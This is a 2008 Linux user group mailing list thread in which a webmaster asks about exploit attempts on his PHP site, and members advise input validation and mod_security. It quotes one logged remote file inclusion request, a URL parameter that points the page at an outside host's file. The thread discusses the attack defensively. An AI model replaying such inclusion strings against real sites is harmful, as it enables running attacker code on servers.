OT: Website Exploits
Joshua Zeidner
jjzeidner at gmail.com
Wed Dec 3 18:23:07 MST 2008
Am I the only one who noticed that you *did not* ask how to secure your
site? ;)
-jmz
On Wed, Dec 3, 2008 at 6:17 PM, keith smith <klsmith2020 at yahoo.com> wrote:
>
> It is a custom site. Basically one page does it all. Depending on what
> parameters/arguments are used in the URL will depend on what content is
> displayed. I setup a switch to test the URL parameters against know
> values. If no know value is entered to defaults to the 404 page.
>
> I'm thinking that is pretty secure.
>
>
> ------------------------
> Keith Smith
>
>
>
> --- On *Wed, 12/3/08, Lisa Kachold <lisakachold at obnosis.com>* wrote:
>
> From: Lisa Kachold <lisakachold at obnosis.com>
> Subject: RE: OT: Website Exploits
> To: klsmith2020 at yahoo.com, plug-discuss at lists.plug.phoenix.az.us
> Date: Wednesday, December 3, 2008, 5:14 PM
>
>
> What index.php are you using? Is this WordPress?
> http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.html
> There are many php exploits:
> http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.html
>
>
> www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
> http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
> ------------------------------
> Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona
> Department of Economic Security will provide a one hour presentation on
> forensics.
>
> ------------------------------
> Date: Wed, 3 Dec 2008 14:57:35 -0800
> From: klsmith2020 at yahoo.com
> Subject: Re: OT: Website Exploits
> To: plug-discuss at lists.plug.phoenix.az.us
>
>
> Thank you for the heads up on mod_security. I'm not sure if that is
> installed or not.
>
> Thanks again!
>
>
> ------------------------
> Keith Smith
>
>
> --- On *Wed, 12/3/08, JD Austin <jd at twingeckos.com>* wrote:
>
> From: JD Austin <jd at twingeckos.com>
> Subject: Re: OT: Website Exploits
> To: klsmith2020 at yahoo.com, "Main PLUG discussion list" <
> plug-discuss at lists.plug.phoenix.az.us>
> Date: Wednesday, December 3, 2008, 3:48 PM
>
> That is a fairly common tactic.
> It exploits poor input validation and register globals in PHP.
> Do yourself a huge favor and install mod_security (I assume you're using
> apache?)
> as an extra measure of security if you haven't already.
>
>
> On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020 at yahoo.com> wrote:
>
>
> Hi,
>
> I am working on a website that gets a lot of exploit attempts.
>
> They mostly look like this: /index.php?display=
> http://humano.ya.com/mysons/index.htm?
>
> Our code is set to disregard any value that is not expected.
>
> I'm wondering if there is a clearing house for reporting this type of
> stuff. I have the IP address as reported.... if that is accurate.
>
> Thanks in advance!
>
> Keith
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
> ------------------------------
> Send e-mail anywhere. No map, no compass. Get your Hotmail(R) account now.<http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081203/5521d6d0/attachment.htm
More information about the PLUG-discuss
mailing list